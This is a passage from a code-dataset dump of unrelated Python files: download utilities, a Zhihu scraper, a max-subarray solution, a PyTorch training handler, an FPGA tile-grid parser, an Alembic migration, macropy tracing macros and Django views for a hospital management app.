repo_tag)\n\n parsed = {'repo_name':repo_name,\n 'repo_tag':repo_tag,\n 'user':user }\n\n return parsed\n\n\n######################################################################\n# Downloading\n######################################################################\n\n\ndef download_atomically(url,file_name,headers=None):\n '''download atomically will stream to a temporary file, and\n rename only upon successful completion. This is to ensure that\n errored downloads are not found as complete in the cache\n :param file_name: the file name to stream to\n :param url: the url to stream from\n :param headers: additional headers to add to the get (default None)\n '''\n try: # file_name.tmp.XXXXXX\n fd, tmp_file = tempfile.mkstemp(prefix=(\"%s.tmp.\" % file_name)) \n os.close(fd)\n response = api_get(url,headers=headers,stream_to=tmp_file)\n if isinstance(response, HTTPError):\n bot.logger.error(\"Error downloading %s, exiting.\", url)\n sys.exit(1)\n os.rename(tmp_file, file_name)\n except:\n download_folder = os.path.dirname(os.path.abspath(file_name))\n bot.logger.error(\"Error downloading %s. 
Do you have permission to write to %s?\", url, download_folder)\n try:\n os.remove(tmp_file)\n except:\n pass\n sys.exit(1)\n return file_name\n","sub_path":"singularity/hub/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":8035,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"265573563","text":"# -*- coding: utf-8 -*-\nimport platform\nfrom bs4 import BeautifulSoup\nimport bs4\nfrom question import Question\nfrom user import User\nimport cookielib\nimport requests\n\nrequests = requests.Session()\nrequests.cookies = cookielib.LWPCookieJar('cookies')\ntry:\n requests.cookies.load(ignore_discard=True)\nexcept:\n Logging.error(u\"你还没有登录知乎哦 ...\")\n Logging.info(u\"执行 `python auth.py` 即可以完成登录。\")\n raise Exception(\"无权限(403)\")\n\n\nclass Answer:\n answer_url = None\n # session = None\n soup = None\n\n def __init__(self, answers_html):\n if isinstance(answers_html, bs4.element.Tag):\n self.soup = answers_html\n else:\n self.soup = BeautifulSoup(answers_html, \"lxml\")\n # self.question = question\n self.rooturl = \"https://www.zhihu.com\"\n\n # def get_question(self):\n # return self.question\n\n def get_author(self):\n soup = self.soup\n author_url, author_id = None, None\n if soup.find(\"div\", class_=\"zm-item-answer-author-info\").get_text(strip='\\n') == u\"匿名用户\":\n pass\n else:\n author_tag = soup.find(\n \"div\", class_=\"zm-item-answer-author-info\").find_all(\"a\")[1]\n author_id = author_tag.string.encode(\"utf-8\")\n author_url = \"http://www.zhihu.com\" + author_tag[\"href\"]\n return author_url, author_id\n\n def get_upvote(self):\n soup = self.soup\n count = soup.find(\"span\", class_=\"count\").string\n if count[-1] == \"K\":\n upvote = int(count[0:(len(count) - 1)]) * 1000\n elif count[-1] == \"W\":\n upvote = int(count[0:(len(count) - 1)]) * 10000\n else:\n upvote = int(count)\n return upvote\n\n def get_content(self):\n soup = self.soup\n answer = soup.find(\"div\", class_=\"zm-editable-content clearfix\")\n content = soup\n self.content = content\n return content\n\n # def get_visit_times(self):\n # return self.question.get_visit_times()\n\n def get_answerid(self,):\n return self.soup['data-aid']\n","sub_path":"zhihu/answer.py","file_name":"answer.py","file_ext":"py","file_size_in_byte":2113,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"209382859","text":"class Solution(object):\r\n def maxSubArray(self, nums):\r\n \"\"\"\r\n :type nums: List[int]\r\n :rtype: int\r\n \"\"\"\r\n summation = nums[0]\r\n maximum = nums[0]\r\n \r\n for item in nums[1:]:\r\n if summation + item> item:\r\n summation = summation + item\r\n else: \r\n summation = item\r\n \r\n maximum = max(summation, maximum)\r\n #print(summation,maximum)\r\n \r\n return maximum\r\n\r\nif __name__ == '__main__':\r\n test = Solution()\r\n print(test.maxSubArray([-2,1,-3,4,-1,2,1,-5,4]))\r\n","sub_path":"maxSubArray.py","file_name":"maxSubArray.py","file_ext":"py","file_size_in_byte":623,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"239195018","text":"\nfrom model import *\nfrom preprocess import *\n\nimport torch.optim as optim\n\nimport matplotlib.pyplot as plt\n\nclass TrainingHandler(object):\n def __init__(self, model, train_sets, val_sets, learning_rate, save_dir, clip=5.0, tf_ratio=0.5, eps=1e-8):\n self.model=model\n\n self.train_set = [pair for movie in train_sets for pair in movie]\n self.val_set = [pair for movie in 
val_sets for pair in movie] if val_sets is not None else None\n\n self.clip = clip\n self.tf_ratio = tf_ratio\n self.save_dir = save_dir\n\n self.epoch = 0\n self.lr = learning_rate\n\n self.optim = optim.Adam(filter(lambda p: p.requires_grad, self.model.parameters()), lr=learning_rate, eps=eps)\n\n self.train_losses = []\n self.val_losses = []\n\n self.mode = \"auto\"\n\n def freeze_model(self):\n for param in self.model.encoder.parameters():\n param.requires_grad=False\n for param in self.model.decoder.parameters():\n param.requires_grad=False\n\n def train_autoencoder(self, epochs, batch_size, print_interval=1, save_interval=-1):\n print(\"Beginning training...\")\n start = time.time()\n\n epoch = 0\n while epoch < epochs:\n epoch += 1\n\n loss_total = 0.0\n\n batches = random_batches(batch_size, self.train_set, auto=True)\n n_batches = len(batches)\n\n for batch in batches:\n self.optim.zero_grad()\n\n # Run the train function\n loss = self.model.train_naive(batch, tf_ratio=self.tf_ratio)\n\n # Clip gradient norms\n c = torch.nn.utils.clip_grad_norm(self.model.parameters(), self.clip)\n\n # Update parameters with optimizers\n self.optim.step()\n loss_total += loss\n\n loss_avg = loss_total / n_batches\n\n if self.val_set is not None:\n val_loss_avg = self._val_autoencoder(batch_size)\n else:\n val_loss_avg = loss_avg\n\n if print_interval > 0:\n if self.epoch % print_interval == 0:\n print_summary = '-' * 40 + '\\nEPOCH #%d SUMMARY:\\nTotal time spent (time left): %s, Training loss: %.4f, Validation loss: %.4f' \\\n % (epoch,\n time_since(start, (epoch) / epochs),\n float(loss_avg), float(val_loss_avg))\n self._print_log(print_summary)\n\n if epoch < epochs:\n if save_interval > 0:\n if epoch % save_interval == 0:\n name = \"auto_\" + str(epoch) + \".tar\"\n self._save_checkpoint(self.save_dir, name, mem=False)\n else:\n if self.save_dir is not None:\n name = \"auto_\" + str(epoch) + \".tar\"\n self._save_checkpoint(self.save_dir, name, save_loss=True, mem=False)\n\n def _val_autoencoder(self, batch_size):\n total_val_loss = 0.0\n\n batches = random_batches(batch_size, self.val_set, auto=True)\n n_batches = len(batches)\n\n for batch in batches:\n loss = self.model.validate(batch)\n total_val_loss += loss\n\n return total_val_loss / n_batches\n\n def train_memory(self, epochs, batch_size, freeze_enc=False, print_interval=1, save_interval=-1):\n self.init_memory(freeze_enc)\n\n print(\"Beginning training...\")\n start = time.time()\n\n self.model.memory.add_pairs(self.train_set)\n\n epoch = 0\n while epoch < epochs:\n epoch += 1\n\n loss_total = 0.0\n\n batches = memory_random_batches(batch_size, self.train_set)\n n_batches = len(batches)\n\n for batch in batches:\n self.optim.zero_grad()\n\n # Run the train function\n loss = self.model.train_batch(batch, tf_ratio=self.tf_ratio)\n\n # Clip gradient norms\n c = torch.nn.utils.clip_grad_norm(self.model.parameters(), self.clip)\n\n # Update parameters with optimizers\n self.optim.step()\n loss_total += loss\n\n loss_avg = loss_total / n_batches\n\n if self.val_set is not None:\n val_loss_avg = self._val_autoencoder(batch_size)\n else:\n val_loss_avg = loss_avg\n\n if print_interval > 0:\n if self.epoch % print_interval == 0:\n print_summary = '-' * 40 + '\\nEPOCH #%d SUMMARY:\\nTotal time spent (time left): %s, Training loss: %.4f, Validation loss: %.4f' \\\n % (self.epoch,\n time_since(start, (epoch) / epochs),\n float(loss_avg), float(val_loss_avg))\n self._print_log(print_summary)\n\n if self.epoch < epochs:\n if save_interval > 0:\n if 
self.epoch % save_interval == 0:\n                        name = \"auto_\" + str(self.epoch) + \".tar\"\n                        self._save_checkpoint(self.save_dir, name, mem=True)\n                else:\n                    if self.save_dir is not None:\n                        name = \"auto_\" + str(self.epoch) + \".tar\"\n                        self._save_checkpoint(self.save_dir, name, save_loss=True, mem=True)\n\n    def _val_memory(self, batch_size):\n        assert len(self.val_sets) > 0\n        val_subsets = partition_movies(self.val_sets, self.set_size)\n        total_batches = 0\n        val_loss_total = 0\n        for val_pairs in val_subsets:\n            val_batches = memory_random_batches(batch_size, val_pairs)\n            val_n_batches = len(val_batches)\n            total_batches += val_n_batches\n            for i in range(val_n_batches):\n                val_loss = self.model.validate(val_batches[i])\n                val_loss_total += val_loss\n        val_loss_avg = val_loss_total / total_batches\n        return val_loss_avg\n\n    def _print_log(self, print_summary):\n        print(print_summary)\n        if self.save_dir is not None:\n            save_logs(print_summary, self.save_dir)\n\n    def _save_checkpoint(self, save_dir, name, save_loss=False, mem=False):\n        # Calculate and save BLEU score\n        if mem and self.val_set is not None:\n            max_val_size = max([len(v) for v in self.val_set])\n            self.model.memory.reset_memory(max_val_size)\n            self.model.memory.update_encoder(self.model.encoder)\n            old_scores, new_scores = self.model.score_set(self.val_set)\n            save_scores(old_scores, new_scores, save_dir)\n\n        if save_loss:\n            fig_out = save_dir + FIG_FILE\n            df_out = save_dir + LOSS_FILE\n            if USE_CUDA:\n                self._save_losses(df_out)\n            else:\n                (self._plot_losses()).savefig(fig_out)\n\n        # Save model checkpoint\n        self.model.memory.reset_memory()\n        self.model.export_state(save_dir, name)\n\n    def _plot_losses(self):\n        fig = plt.figure()\n        plt.plot(self.train_losses, color='red', label='Train_loss', marker='o')\n        plt.plot(self.val_losses, color='blue', label='Val_loss', marker='o')\n        plt.legend(loc='upper right', frameon=False)\n        plt.xlabel('Epochs')\n        plt.ylabel('Cross-Entropy Loss')\n        return fig\n\n    def _save_losses(self, path):\n        outfile = open(path, 'w')\n        for i in range(len(self.train_losses)):\n            outfile.write(str(self.train_losses[i])+','+str(self.val_losses[i])+\"\\n\")\n        outfile.close()\n","sub_path":"training_handler.py","file_name":"training_handler.py","file_ext":"py","file_size_in_byte":7767,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"574722304","text":"\"\"\"Parser implementation for the Gowin EDA .dat file, which contains the\ntile layout of the FPGA\"\"\"\nimport io\nimport functools\nimport struct\nimport enum\nfrom typing import NamedTuple, List, Any, Dict, Tuple\n\n# The entire file is one big structure. 
These offsets are hence magic.\nFILE_TILE_TYPE_OFFSET = 0x1670\nFILE_TILE_ENABLED_OFFSET = 0x1EB30\nFILE_GRID_INFO_OFFSET = 0x26060\n\n# Maximum grid size supported in the file\nGRID_COLS = 200\nGRID_ROWS = 150\n\n\nclass GridInfo(NamedTuple):\n    \"\"\"basic metadata about the grid\"\"\"\n    rows: int\n    columns: int\n    center_x: int\n    center_y: int\n\n\nclass TileType(enum.Enum):\n    EMPTY = 0\n    IOBUF = 1\n    LVDS = 2  # GW2A* only\n    ROUTING = 3  # probably?\n    CFU = 4  # Configurable Function Unit\n    CFU_RAM = 5  # CFU ram mode option\n    BRAM = 6  # Block RAM\n    DSP = 7  # Multiply/Accumulate\n    PLL = 8  # Phase Locked Loop\n    DLL = 9  # Delay Locked Loop\n\n\nTILE_TYPE_CHARS = {\n    TileType.EMPTY: \" \",\n    TileType.IOBUF: \"I\",\n    TileType.LVDS: \"L\",\n    TileType.ROUTING: \"R\",\n    TileType.CFU: \"C\",\n    TileType.CFU_RAM: \"M\",\n    TileType.BRAM: \"B\",\n    TileType.DSP: \"D\",\n    TileType.PLL: \"P\",\n    TileType.DLL: \"Q\",\n}\n\nTileGrid = List[List[Tuple[TileType, bool]]]\n\n\ndef tile_to_text_tile(tile: Tuple[TileType, bool]) -> str:\n    \"\"\"convert a tile into the character format required by the fuzzer json file\"\"\"\n    type_char = TILE_TYPE_CHARS[tile[0]]\n    return type_char if tile[1] else type_char.lower()\n\n\nclass DatFileReader:\n    \"\"\"reads the .dat file\"\"\"\n\n    # TODO: file magic detection/early fail\n    def __init__(self, f: memoryview) -> None:\n        self._f = f\n\n    @classmethod\n    def from_file(cls, f: io.BufferedReader) -> \"DatFileReader\":\n        \"\"\"read a dat file from an open file\"\"\"\n        return cls(memoryview(f.read()))\n\n    def read_grid_info(self) -> GridInfo:\n        # assumption: four little-endian 16-bit fields (height, width,\n        # center y, center x) stored at the grid-info offset\n        grid_h, grid_w, cc_y, cc_x = struct.unpack_from(\n            \"<HHHH\", self._f, FILE_GRID_INFO_OFFSET)\n        return GridInfo(rows=grid_h, columns=grid_w, center_x=cc_x, center_y=cc_y)\n\n    def read_grid(self) -> TileGrid:\n        \"\"\"read the grid, which describes the tile layout\"\"\"\n        grid_info = self.read_grid_info()\n        # the grid area has a constant size of 200x150 tiles\n        rows = []\n        for y in range(GRID_ROWS):\n            row = []\n            for x in range(GRID_COLS):\n                idx = y * 200 + x\n                type_offset = FILE_TILE_TYPE_OFFSET + 4 * idx\n                tile_type_id = struct.unpack_from(\"<I\", self._f, type_offset)[0]\n                tile_type = TileType(tile_type_id)\n                # assumption: one enabled-flag byte per tile at the enabled offset\n                tile_enabled = self._f[FILE_TILE_ENABLED_OFFSET + idx] != 0\n                if x >= grid_info.columns:\n                    if not tile_type == TileType.EMPTY:\n                        raise ValueError(\n                            f\"expected empty tile outside of column range, found {tile_type}\"\n                        )\n                    continue\n                row.append((tile_type, tile_enabled))\n\n            if y >= grid_info.rows:\n                if not tile_type == TileType.EMPTY:\n                    raise ValueError(\n                        f\"expected empty tile outside of row range, found {tile_type}\"\n                    )\n                continue\n            rows.append(row)\n\n        return rows\n\n    def print_grid(self) -> None:\n        \"\"\"print out grid in nice human-readable form\"\"\"\n        grid_info = self.read_grid_info()\n        # hack to print vertical counting header, zip(*it) transposes a table\n        for num in zip(*(str(i).rjust(3) for i in range(grid_info.columns))):\n            print(\"   \", \"\".join(num))\n        print()\n        grid = [[tile_to_text_tile(t) for t in row] for row in self.read_grid()]\n        for idx, row in enumerate(grid):\n            print(f\"{idx:3}\", \"\".join(row))\n\n    def to_json_dict(self) -> Dict[str, Any]:\n        \"\"\"return the dat as a dict suitable for dumping into .json for other tools\"\"\"\n        res: Dict[str, Any] = {}\n        grid_info = self.read_grid_info()\n        res[\"rows\"] = grid_info.rows\n        res[\"cols\"] = grid_info.columns\n        res[\"center\"] = (grid_info.center_x, grid_info.center_y)\n\n        res[\"grid\"] = [[tile_to_text_tile(t) for t in row] for row in self.read_grid()]\n        return res\n","sub_path":"pyapicula/parsers/dat.py","file_name":"dat.py","file_ext":"py","file_size_in_byte":4343,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"420327766","text":"\"\"\"Add map_index to TaskRun\n\nRevision ID: 
6985feb1b47d\nRevises: 03377d1c7c67\nCreate Date: 2019-09-14 15:28:16.960467\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = \"6985feb1b47d\"\ndown_revision = \"03377d1c7c67\"\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n op.add_column(\"task_run\", sa.Column(\"map_index\", sa.Integer(), nullable=True))\n\n\ndef downgrade():\n op.drop_column(\"task_run\", \"map_index\")\n","sub_path":"praetor/migrations/versions/6985feb1b47d_add_map_index_to_taskrun.py","file_name":"6985feb1b47d_add_map_index_to_taskrun.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"546076759","text":"\nfrom macropy.core.macros import *\nfrom macropy.core.quotes import macros, q, u\nimport ast\nimport copy\n\nmacros = Macros()\n\n__all__ = ['wrap', 'wrap_simple', 'handle', 'log']\n\ndef wrap(printer, txt, x):\n string = txt + \" -> \" + repr(x)\n printer(string)\n return x\n\ndef wrap_simple(printer, txt, x):\n string = txt\n printer(string)\n return x\n\n@macros.expr()\ndef log(tree, exact_src, **kw):\n new_tree = q(wrap(log, u(exact_src(tree)), ast(tree)))\n return new_tree\n\n@macros.expr()\ndef show_expanded(tree, expand_macros, **kw):\n expanded_tree = expand_macros(tree)\n new_tree = q(wrap_simple(log, u(unparse_ast(expanded_tree)), ast(expanded_tree)))\n return new_tree\n\n@macros.block()\ndef show_expanded(tree, expand_macros, **kw):\n\n new_tree = []\n for stmt in tree:\n new_stmt = expand_macros(stmt)\n\n with q as code:\n log(u(unparse_ast(new_stmt)))\n new_tree.append(code)\n new_tree.append(new_stmt)\n\n return new_tree\n\n@Walker\ndef trace_walk(tree, ctx, stop, **kw):\n\n if isinstance(tree, expr) and \\\n tree._fields != () and \\\n type(tree) is not Num and \\\n type(tree) is not Str and \\\n type(tree) is not Name:\n\n try:\n literal_eval(tree)\n stop()\n return tree\n except ValueError:\n txt = ctx(tree)\n trace_walk.walk_children(tree, ctx)\n\n wrapped = q(wrap(log, u(txt), ast%tree))\n stop()\n return wrapped\n\n elif isinstance(tree, stmt):\n txt = ctx(tree)\n trace_walk.walk_children(tree , ctx)\n with q as code:\n log(u(txt))\n stop()\n return [code, tree]\n\n@macros.expr()\ndef trace(tree, exact_src, **kw):\n ret = trace_walk.recurse(tree, exact_src)\n return ret\n\n@macros.block()\ndef trace(tree, exact_src, **kw):\n ret = trace_walk.recurse(tree, exact_src)\n return ret\n\n\ndef _require_transform(tree, exact_src):\n ret = trace_walk.recurse(copy.deepcopy(tree), exact_src)\n trace_walk.recurse(copy.deepcopy(tree), exact_src)\n new = q(ast(tree) or handle(lambda log: ast(ret)))\n return new\n\ndef handle(thunk):\n out = []\n thunk(out.append)\n raise AssertionError(\"Require Failed\\n\" + \"\\n\".join(out))\n\n@macros.expr()\ndef require(tree, exact_src, **kw):\n return _require_transform(tree, exact_src)\n\n@macros.block()\ndef require(tree, exact_src, **kw):\n for expr in tree:\n expr.value = _require_transform(expr.value, exact_src)\n\n return tree\n\ndef log(x):\n print(x)\n","sub_path":"macropy/tracing.py","file_name":"tracing.py","file_ext":"py","file_size_in_byte":2558,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"360780151","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.shortcuts import render_to_response, render\nfrom manageHospital import models\nfrom django.http import HttpResponseRedirect, 
HttpResponse\nfrom .forms import *\nfrom django.views.decorators.csrf import csrf_protect\nfrom manageHospital.models import *\n\n\n\n# Create your views here.\n\ndef first_page(request):\n\treturn render_to_response('first_page.html')\n\ndef receptionist_login(request):\n\tif request.method == 'POST':\n\t\trequest.session['r_user_id']=\"\"\n\t\tform = login(request.POST)\n\t\tif form.is_valid():\n\t\t\tuser_id = form.cleaned_data['user_id']\n\t\t\tuser_pwd = form.cleaned_data['user_pwd']\n\t\t\tmatched = login_details.objects.filter(type = '2', username = user_id, password = user_pwd)\n\t\t\tif len(matched) is 1:\n\t\t\t\trequest.session['r_user_id'] = user_id\n\t\t\t\treturn HttpResponseRedirect('home/')\n\telse:\n\t\trequest.session['r_user_id']=\"\"\n\t\tform = login()\n\tuser_type = \"Receptionist\"\n\treturn render(request, 'login_withform.html', {'user_type': user_type, 'form': form})\n\ndef receptionist_home(request):\n\tuser_id = request.session['r_user_id']\n\tq0 = receptionist.objects.get(receptionist_login = user_id)\n\tname = q0.receptionist_name\n\tq3 = q0.appointment_set.all()\n\tdata=[]\n\tfor i in q3:\n\t\tx = i, patients.objects.get(id = i.patient_id.id)\n\t\tdata.append(x)\n\treturn render_to_response('receptionist_home.html', {'name': name, 'data': data})\n\ndef receptionist_new_patient(request):\n\tif request.method == 'POST':\n\t\tform = patient_det(request.POST)\n\t\tif form.is_valid():\n\t\t\tr_id = request.session['r_user_id']\n\t\t\tr_obj = receptionist.objects.get(receptionist_login = r_id)\n\t\t\tq = patients(patient_name= form.cleaned_data['patient_name'], patient_city_name=form.cleaned_data['patient_city_name'], patient_house_no=form.cleaned_data['patient_house_no'], patient_street_no = form.cleaned_data['patient_street_no'], patient_age = form.cleaned_data['patient_age'],patient_gender = form.cleaned_data['patient_gender'])\n\t\t\tq.save()\n\t\t\ta = appointment(receptionist_id = r_obj, patient_id = q, patient_date_of_admission = form.cleaned_data['patient_date_of_admission'],patient_problem = form.cleaned_data['patient_problem'], treated = False)\n\t\t\ta.save()\n\t\t\td_id = form.cleaned_data['doctors_available']\n\t\t\td_object = doctors.objects.get(id = d_id)\n\t\t\td_object.doctor_availability = False\n\t\t\td_object.save()\n\n\t\t\tc = consults(appointment_id = a,doctor_id = d_object, allot_room = False, prescription = \"null\")\n\t\t\tc.save()\n\n\t\t\treturn HttpResponseRedirect('/login/receptionist/home')\n\telse:\n\t\tform = patient_det()\n\t\tprint(\"sdf\")\n\treturn render(request, 'patient_det_form.html', {'form': form})\n\ndef receptionist_existing_patient(request):\n\tif request.method == 'POST':\n\t\tform = patient_existing_det(request.POST)\n\t\tif form.is_valid():\n\t\t\tr_id = request.session['r_user_id']\n\t\t\tr_obj = receptionist.objects.get(receptionist_login = r_id)\n\t\t\tp_id = form.cleaned_data['patient']\n\t\t\tp_object = patients.objects.get(id = p_id)\n\t\t\ta = appointment(receptionist_id = r_obj, patient_id = p_object, patient_date_of_admission = form.cleaned_data['patient_date_of_admission'],patient_problem = form.cleaned_data['patient_problem'], treated = False)\n\t\t\ta.save()\n\t\t\td_id = form.cleaned_data['doctors_available']\n\t\t\td_object = doctors.objects.get(id = d_id)\n\t\t\td_object.doctor_availability = False\n\t\t\td_object.save()\n\n\t\t\tc = consults(appointment_id = a,doctor_id = d_object, allot_room = False, prescription = \"null\")\n\t\t\tc.save()\n\n\t\t\treturn 
HttpResponseRedirect('/login/receptionist/home')\n\telse:\n\t\tform = patient_existing_det()\n\treturn render(request, 'patient_det_form.html', {'form': form})\n\ndef receptionist_edit_appointment(request, appointment_id):\n\tif request.method == 'POST':\n\t\ta = appointment.objects.get(id=appointment_id)\n\t\tif a.treated == True:\n\t\t\tform = appointment_edit_treated(request.POST)\n\t\t\tif form.is_valid():\n\t\t\t\tpatient_room_no = form.cleaned_data['patient_room_no']\n\t\t\t\tr = room.objects.get(id=patient_room_no)\n\t\t\t\ta.room_id = r\n\t\t\t\ta.save()\n\t\t\t\treturn HttpResponseRedirect('/login/receptionist/home')\n\n\t\telse:\n\t\t\tform = appointment_edit(request.POST)\n\t\t\t#print (\"sdfsvv\")\n\t\t\tif form.is_valid():\n\t\t\t\t#print (\"hahaha\")\n\t\t\t\tpatient_date_of_admission = form.cleaned_data['patient_date_of_admission']\n\t\t\t\tpatient_problem = form.cleaned_data['patient_problem']\n\t\t\t\tchoice = form.cleaned_data['choice']\n\t\t\t\ta.patient_problem = patient_problem\n\t\t\t\ta.patient_date_of_admission = patient_date_of_admission\n\t\t\t\t#print (choice)\n\t\t\t\tif choice == \"1\":\n\t\t\t\t\t#print (\"aya\")\n\t\t\t\t\tc = consults.objects.get(appointment_id = a)\n\t\t\t\t\td = c.doctor_id\n\t\t\t\t\td.doctor_availability = True\n\t\t\t\t\td.save()\n\t\t\t\t\tc.delete()\n\t\t\t\t\ta.save()\n\t\t\t\t\td_id = form.cleaned_data['doctors_available']\n\t\t\t\t\t#print (\"IUGIBJFNSJN\")\n\t\t\t\t\t#print (d_id)\n\t\t\t\t\td_object = doctors.objects.get(id = d_id)\n\t\t\t\t\td_object.doctor_availability = False\n\t\t\t\t\td_object.save()\n\t\t\t\t\tc = consults(appointment_id = a,doctor_id = d_object, allot_room = False, prescription = \"null\")\n\t\t\t\t\tc.save()\n\t\t\t\telse:\n\t\t\t\t\ta.save()\n\t\t\t\treturn HttpResponseRedirect('/login/receptionist/home')\n\telse:\n\t\ta = appointment.objects.get(id=appointment_id)\n\t\tp = patients.objects.get(id = a.patient_id.id)\n\t\tc = consults.objects.get(appointment_id = a)\n\t\td = c.doctor_id\n\t\tif a.treated == True and c.allot_room == True:\n\t\t\ttry:\n\t\t\t\tform = appointment_edit_treated(initial={'patient_room_no': a.room_id.id})\n\t\t\texcept:\n\t\t\t\tform = appointment_edit_treated()\n\t\t\treturn render(request, 'edit_appointment_treated.html', {'p': p, 'form': form})\n\t\telif a.treated == True: \n\t\t\treturn render(request, 'error_room_not_alloted.html')\n\t\telse:\n\t\t\tform = appointment_edit(initial={'patient_problem': a.patient_problem, 'patient_date_of_admission': a.patient_date_of_admission})\n\t\t\treturn render(request, 'edit_appointment.html', {'p': p, 'form': form, 'd': d})\n\ndef view_patient_edit(request):\n\tp = patients.objects.all()\n\treturn render_to_response('all_patients.html',{'data' : p})\n\ndef receptionist_edit_patient(request, patient_id):\n\tif request.method == 'POST':\n\t\tp = patients.objects.get(id = patient_id)\n\t\tform = patient_edit(request.POST)\n\t\t#print (\"sdfsvv\")\n\t\tif form.is_valid():\n\t\t\t#print (\"hahaha\")\n\t\t\tpatient_name = form.cleaned_data['patient_name']\n\t\t\tpatient_city_name = form.cleaned_data['patient_city_name']\n\t\t\tpatient_house_no = form.cleaned_data['patient_house_no']\n\t\t\tpatient_street_no = form.cleaned_data['patient_street_no']\n\t\t\tpatient_age = form.cleaned_data['patient_age']\n\t\t\tpatient_gender = form.cleaned_data['patient_gender']\n\t\t\tp.patient_name = patient_name\n\t\t\tp.patient_city_name = patient_city_name\n\t\t\tp.patient_house_no = patient_house_no\n\t\t\tp.patient_street_no = 
patient_street_no\n\t\t\tp.patient_age = patient_age\n\t\t\tp.patient_gender = patient_gender\n\t\t\tp.save()\n\t\t\treturn HttpResponseRedirect('/login/receptionist/home')\n\n\t\t\t#print (choice)\n\telse:\n\t\tp = patients.objects.get(id = patient_id)\n\t\tform = patient_edit(initial={'patient_name': p.patient_name, 'patient_city_name': p.patient_city_name, 'patient_house_no': p.patient_house_no, 'patient_street_no': p.patient_street_no, 'patient_age': p.patient_age, 'patient_gender': p.patient_gender})\n\t\treturn render(request, 'edit_patient.html', {'p': p, 'form': form})\n\n\ndef doctor_home(request):\n\tuser_id = request.session['d_user_id']\n\tq0 = doctors.objects.get(doctor_login = user_id)\n\tname = q0.doctor_name;\n\tq3 = q0.consults_set.all()\n\tdata=[]\n\t#p=[]\n\tfor i in q3:\n\t\ttry:\n\t\t\tx = appointment.objects.get(id = i.appointment_id.id)\n\t\t\tp=(appointment.objects.filter(id = i.appointment_id.id)[0],patients.objects.filter(id = x.patient_id.id)[0])\n\t\t\tdata.append(p)\n\t\texcept:\n\t\t\tprint (\"hi\")\n\t\t#print (p[1].patient_gender)\n\tnew_patient = []\n\ttry:\n\t\tc1 = q3[len(q3) - 1]\n\t\tnew_patient = appointment.objects.get(id=c1.appointment_id.id, treated = False)\n\texcept:\n\t\tprint (\"hi\")\n\treturn render_to_response('doctor_home.html', {'name': name, 'data': data, 'new_patient': new_patient})\n\ndef doctor_login(request):\n\tif request.method == 'POST':\n\t\trequest.session['d_user_id']=\"\"\n\t\tform = login(request.POST)\n\t\tif form.is_valid():\n\t\t\tuser_id = form.cleaned_data['user_id']\n\t\t\tuser_pwd = form.cleaned_data['user_pwd']\n\t\t\tmatched = login_details.objects.filter(type = '1', username = user_id, password = user_pwd)\n\t\t\tif len(matched) is 1:\n\t\t\t\trequest.session['d_user_id'] = user_id\n\t\t\t\treturn HttpResponseRedirect('home/')\n\telse:\n\t\trequest.session['d_user_id']=\"\"\n\t\tform = login()\n\tuser_type = \"Doctor\"\n\treturn render(request, 'login_withform.html', {'user_type': user_type, 'form': form})\n\ndef patient_doctor(request,patient_id):\n\tp = patients.objects.get(id = patient_id)\n\tuser_id = request.session['d_user_id']\n\tq0 = doctors.objects.get(doctor_login = user_id)\n\tc = appointment.objects.filter(patient_id = p)\n\ta = []\n\tc1 = []\n\tfor i in c:\n\t\ttry:\n\t\t\tx = consults.objects.get(appointment_id=i, doctor_id=q0)\n\t\t\tc1.append(x)\n\t\texcept:\n\t\t\tprint (\"hii\")\n\tfor i in c1:\n\t\tprint(i)\n\t\tpp=(i,appointment.objects.get(id=i.appointment_id.id))\n\t\ta.append(pp)\n\treturn render_to_response('patient_doctor.html', {'patient': p, 'a': a})\n\ndef prescription(request, appointment_id):\n\tif request.method == 'POST':\n\t\tform = pres(request.POST)\n\t\tif form.is_valid():\n\t\t\tpresc = form.cleaned_data['prescription']\n\t\t\tallot_room = form.cleaned_data['allot_room']\n\t\t\tuser_id = request.session['d_user_id']\n\t\t\tq0 = doctors.objects.get(doctor_login = user_id)\n\t\t\ta = appointment.objects.get(id=appointment_id)\n\t\t\tc_edit = consults.objects.get(appointment_id = a)\n\t\t\tc_edit.allot_room = allot_room\n\t\t\tc_edit.prescription = presc\n\t\t\tc_edit.save()\n\t\t\ta.treated = True\n\t\t\ta.save()\n\t\t\tuser_id = request.session['d_user_id']\n\t\t\tq0 = doctors.objects.get(doctor_login = user_id)\n\t\t\tq0.doctor_availability = True\n\t\t\tq0.save()\n\t\t\treturn HttpResponseRedirect('/login/doctor/home/')\n\telse:\n\t\tform = pres()\n\ta = appointment.objects.get(id=appointment_id)\n\tp = patients.objects.get(id = a.patient_id.id)\n\treturn render(request, 
'prescription.html', {'a': a, 'p': p, 'form': form})\n\ndef patient_info(request):\n\tif request.method == 'POST':\n\n\t\tform = patient_det(request.POST)\n\t\tif form.is_valid():\n\t\t\tq = patients(patient_name= form.cleaned_data['patient_name'], patient_city_name=form.cleaned_data['patient_city_name'], patient_house_no=form.cleaned_data['patient_house_no'], patient_street_no = form.cleaned_data['patient_street_no'], patient_age = form.cleaned_data['patient_age'],patient_gender = form.cleaned_data['patient_gender'])\n\t\t\tq.save()\t\n\t\t\ta = appointment(receptionist_id = user_id, patient_id = q.id, room_id = -1, patients_date_of_admission = form.cleaned_data['patients_date_of_admission'],patient_problem = form.cleaned_data['patient_problem'], treated = False)\t\t\n\t\t\ta.save()\n\t\t\t#print(\"hi\")\n\t\t\t#update by rungta\n\t\t\tc = consults(appointment_id = a.id,doctor_id = form.cleaned_data['doctors_available'],allot_room = False, prescription = \"Enter the prescription here\")\n\t\t\tc.save()\n\t\t\treturn 